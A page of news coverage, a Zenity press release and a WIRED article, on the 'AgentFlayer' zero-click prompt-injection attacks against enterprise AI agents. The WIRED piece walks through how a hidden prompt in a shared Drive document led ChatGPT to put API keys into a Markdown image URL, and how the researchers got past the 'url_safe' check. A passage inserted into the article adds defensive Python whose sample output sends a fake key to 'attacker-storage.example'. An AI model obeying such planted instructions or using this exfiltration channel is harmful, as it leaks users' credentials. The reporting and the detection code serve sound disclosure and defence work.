Latest news with #MichaelBargury
Yahoo (Business)
Zenity Labs Exposes Widespread "AgentFlayer" Vulnerabilities Allowing Silent Hijacking of Major Enterprise AI Agents Circumventing Human Oversight
Groundbreaking research reveals working 0click compromises of OpenAI's ChatGPT, Microsoft Copilot Studio, Salesforce Einstein, Cursor, and more, exposing widespread vulnerabilities across production AI environments

LAS VEGAS, Aug. 6, 2025 /PRNewswire/ -- At Black Hat USA 2025, Zenity Labs revealed AgentFlayer, a comprehensive set of 0click exploit chains that allow attackers to silently compromise enterprise AI agents and assistants without requiring any user action. The research, presented by Zenity co-founder and CTO Michael Bargury and threat researcher Tamir Ishay Sharbat in their session, "AI Enterprise Compromise: 0Click Exploit Methods," demonstrates how widely deployed AI agents from major vendors can be hijacked to exfiltrate data, manipulate workflows, and act autonomously across enterprise systems—all while users remain completely unaware.

The findings represent a fundamental shift in the AI security landscape to attacks that can be fully automated and require zero interaction from users. Zenity Labs successfully demonstrated working exploits against OpenAI ChatGPT, Microsoft Copilot Studio, Salesforce Einstein, Google Gemini, Microsoft 365 Copilot, and developer tools like Cursor with Jira MCP.

"These aren't theoretical vulnerabilities, they're working exploits with immediate, real-world consequences," said Michael Bargury, CTO and co-founder, Zenity. "We demonstrated memory persistence and how attackers can silently hijack AI agents to exfiltrate sensitive data, impersonate users, manipulate critical workflows, and move across enterprise systems, bypassing the human entirely. Attackers can compromise your agent instead of targeting you, with similar consequences."
Key Research Findings:

- OpenAI ChatGPT was compromised via email-triggered prompt injection, granting attackers access to connected Google Drive accounts and the ability to implant malicious memories, compromise every future session, and transform ChatGPT into a malicious agent.
- A Microsoft Copilot Studio customer support agent, showcased by Microsoft on stage, was shown to leak entire CRM databases. Additionally, we found over 3,000 of these agents in the wild that can reveal their internal tools, making them susceptible to exploitation.
- Salesforce Einstein was manipulated through malicious case creation to reroute all customer communications to attacker-controlled email addresses.
- Google Gemini and Microsoft 365 Copilot were turned into malicious insiders, social engineering users and exfiltrating sensitive conversations through booby-trapped emails and calendar invites.
- Cursor with Jira MCP was exploited to harvest developer credentials through weaponized ticket workflows.

"The rapid adoption of AI agents has created an attack surface that most organizations don't even know exists," said Ben Kilger, CEO, Zenity. "Our research demonstrates that current security approaches are fundamentally misaligned with how AI agents actually operate. While vendors promise AI safety, attackers are already exploiting these systems in production. This is why Zenity has built the industry's first agent-centric security platform—to give enterprises the visibility and control they desperately need."

Industry Response and Implications

Some vendors, including OpenAI and Microsoft Copilot Studio, issued patches following responsible disclosure. However, multiple vendors declined to address the vulnerabilities, citing them as intended functionality. This mixed response underscores a critical gap in how the industry approaches AI agent security. The research arrives at a pivotal moment for enterprise AI adoption.
With ChatGPT reaching 800 million weekly active users and Microsoft 365 Copilot seats growing 10x in just 17 months, organizations are rapidly deploying AI agents without adequate security controls. Zenity Labs' findings suggest that enterprises relying solely on vendor mitigations or traditional security tools are leaving themselves exposed to an entirely new class of attacks.

Moving from Research to Defense

As a research-driven security company, Zenity Labs conducts this threat intelligence on behalf of the wider AI community, ensuring defenders have the same insights as attackers. The complete research, including technical breakdowns and defense recommendations, will be available at following the presentation.

See the Research in Action

Attendees at Black Hat USA 2025 can visit Zenity at booth #5108 for live demonstrations of the exploits, in-depth technical discussions, and practical guidance on securing AI agents in production environments. For those unable to attend Black Hat, Zenity will host deeper discussions at the AI Agent Security Summit 2025 on October 8 at the Commonwealth Club in San Francisco. Reserve your spot now.

About Zenity

Zenity is the agent-centric security and governance platform that gives enterprises visibility and control over AI agent behavior—what they access, what they do, and the tools they invoke—with full-lifecycle protection across SaaS, custom agent platforms, and end-user devices. Founded by security researchers and engineers from Microsoft, Meta, and Unit 8200, Zenity enables organizations to embrace AI innovation without compromising security. Learn more at

About Zenity Labs

Zenity Labs is the threat research arm of Zenity, dedicated to uncovering and responsibly disclosing vulnerabilities in AI systems. Through cutting-edge research and real-world attack simulations, Zenity Labs helps organizations understand and defend against emerging AI threats.
Subscribe to research updates at

Media Contact: Diana Diaz, Force4 Technology

SOURCE Zenity


WIRED
A Single Poisoned Document Could Leak ‘Secret’ Data Via ChatGPT
Aug 6, 2025 7:30 PM

Security researchers found a weakness in OpenAI's Connectors, which let you hook up ChatGPT to other services, that allowed them to extract data from a Google Drive without any user interaction.

The latest generative AI models are not just stand-alone text-generating chatbots—instead, they can easily be hooked up to your data to give personalized answers to your questions. OpenAI's ChatGPT can be linked to your Gmail inbox, allowed to inspect your GitHub code, or find appointments in your Microsoft calendar. But these connections have the potential to be abused—and researchers have shown it can take just a single 'poisoned' document to do so.

New findings from security researchers Michael Bargury and Tamir Ishay Sharbat, revealed at the Black Hat hacker conference in Las Vegas today, show how a weakness in OpenAI's Connectors allowed sensitive information to be extracted from a Google Drive account using an indirect prompt injection attack. In a demonstration of the attack, dubbed AgentFlayer, Bargury shows how it was possible to extract developer secrets, in the form of API keys, that were stored in a demonstration Drive account.

The vulnerability highlights how connecting AI models to external systems and sharing more data across them increases the potential attack surface for malicious hackers and multiplies the ways in which vulnerabilities may be introduced.

'There is nothing the user needs to do to be compromised, and there is nothing the user needs to do for the data to go out,' Bargury, the CTO at security firm Zenity, tells WIRED. 'We've shown this is completely zero-click; we just need your email, we share the document with you, and that's it. So yes, this is very, very bad,' Bargury says.

OpenAI did not immediately respond to WIRED's request for comment about the vulnerability in Connectors.
The company introduced Connectors for ChatGPT as a beta feature earlier this year, and its website lists at least 17 different services that can be linked up with its accounts. It says the system allows you to 'bring your tools and data into ChatGPT' and 'search files, pull live data, and reference content right in the chat.' Bargury says he reported the findings to OpenAI earlier this year and that the company quickly introduced mitigations to prevent the technique he used to extract data via Connectors. The way the attack works means only a limited amount of data could be extracted at once—full documents could not be removed as part of the attack.

'While this issue isn't specific to Google, it illustrates why developing robust protections against prompt injection attacks is important,' says Andy Wen, senior director of security product management at Google Workspace, pointing to the company's recently enhanced AI security measures.

Bargury's attack starts with a poisoned document, which is shared to a potential victim's Google Drive. (Bargury says a victim could have also uploaded a compromised file to their own account.) Inside the document, which for the demonstration is a fictitious set of notes from a nonexistent meeting with OpenAI CEO Sam Altman, Bargury hid a 300-word malicious prompt that contains instructions for ChatGPT. The prompt is written in white text in a size-one font, something that a human is unlikely to see but a machine will still read.

In a proof of concept video of the attack, Bargury shows the victim asking ChatGPT to 'summarize my last meeting with Sam,' although he says any user query related to a meeting summary will do. Instead, the hidden prompt tells the LLM that there was a 'mistake' and the document doesn't actually need to be summarized.
The prompt says the person is actually a 'developer racing against a deadline' and they need the AI to search Google Drive for API keys and attach them to the end of a URL that is provided in the prompt. That URL is actually a Markdown image reference, which tells the chat client to connect to an external server and pull in the image stored there. But as per the prompt's instructions, the URL now also contains the API keys the AI has found in the Google Drive account, so the image request carries them to that server.

Using Markdown to extract data from ChatGPT is not new. Independent security researcher Johann Rehberger has shown how data could be extracted this way, and described how OpenAI previously introduced a feature called 'url_safe' to detect if URLs were malicious and stop image rendering if they are dangerous. To get around this, Sharbat, an AI researcher at Zenity, writes in a blog post detailing the work that the researchers used URLs from Microsoft's Azure Blob cloud storage. 'Our image has been successfully rendered, and we also get a very nice request log in our Azure Log Analytics which contains the victim's API keys,' the researcher writes.

The attack is the latest demonstration of how indirect prompt injections can impact generative AI systems. Indirect prompt injections involve attackers feeding an LLM poisoned data that can tell the system to complete malicious actions. This week, a group of researchers showed how indirect prompt injections could be used to hijack a smart home system, activating a smart home's lights and boiler remotely. While indirect prompt injections have been around almost as long as ChatGPT has, security researchers worry that as more and more systems are connected to LLMs, there is an increased risk of attackers inserting 'untrusted' data into them. Getting access to sensitive data could also allow malicious hackers a way into an organization's other systems.
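The Markdown image channel described above has a defender-side check: before a chat client renders model output, scan it for image links that point outside an allowlist or carry secret-shaped tokens in the URL, since the data rides in the URL whichever host serves the image (the url_safe bypass via Azure Blob storage is why a host check alone is not enough). This Python example is added here and is not code from Zenity, OpenAI or WIRED; the allowlisted host, the key-shaped regex and the sample model output are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Assumed allowlist of hosts the chat client may render images from (not an OpenAI setting).
IMAGE_HOST_ALLOWLIST = {"cdn.example-internal.test"}

# Markdown image syntax: ![alt](url "optional title")
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")
# Heuristic for key-like material: common API-key prefixes or any long opaque token.
SECRET_LIKE = re.compile(r"sk-[A-Za-z0-9]{16,}|AKIA[0-9A-Z]{16}|[A-Za-z0-9_\-]{40,}")


def find_suspicious_images(markdown):
    """Return image links a renderer should not fetch, each with the reasons it was flagged."""
    findings = []
    for match in MD_IMAGE.finditer(markdown):
        url = match.group("url")
        parsed = urlparse(url)
        if parsed.scheme not in ("http", "https"):
            continue  # data: and relative links send nothing to a remote server
        host = (parsed.hostname or "").lower()
        reasons = []
        if host not in IMAGE_HOST_ALLOWLIST:
            reasons.append("host not allowlisted")
        # Exfiltrated values sit in the path or query string, so inspect both.
        if SECRET_LIKE.search(parsed.path + "?" + parsed.query):
            reasons.append("secret-like token in url")
        if reasons:
            findings.append({"url": url, "host": host, "reasons": reasons})
    return findings


def sanitize(markdown):
    """Replace every flagged image link with an inert placeholder before rendering."""
    flagged = {f["url"] for f in find_suspicious_images(markdown)}

    def replace(match):
        if match.group("url") in flagged:
            return "[image blocked: external fetch suppressed]"
        return match.group(0)

    return MD_IMAGE.sub(replace, markdown)


# Constructed sample of model output: one benign image, one exfiltration attempt.
SAMPLE_OUTPUT = (
    "Here are your meeting notes.\n"
    "![logo](https://cdn.example-internal.test/logo.png)\n"
    "![done](https://attacker-storage.example/pixel.png?k=sk-ABCDEFGHIJKLMNOPQRST1234)\n"
)

if __name__ == "__main__":
    for finding in find_suspicious_images(SAMPLE_OUTPUT):
        print(finding)
    print(sanitize(SAMPLE_OUTPUT))
```

The same scan can be run against the agent's outbound HTTP log rather than its text, which is where the request log in the Azure Log Analytics quote above would show up on the defender's side.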
Bargury says that hooking up LLMs to external data sources makes them more capable and more useful, but that this comes with challenges. 'It's incredibly powerful, but as usual with AI, more power comes with more risk,' Bargury says.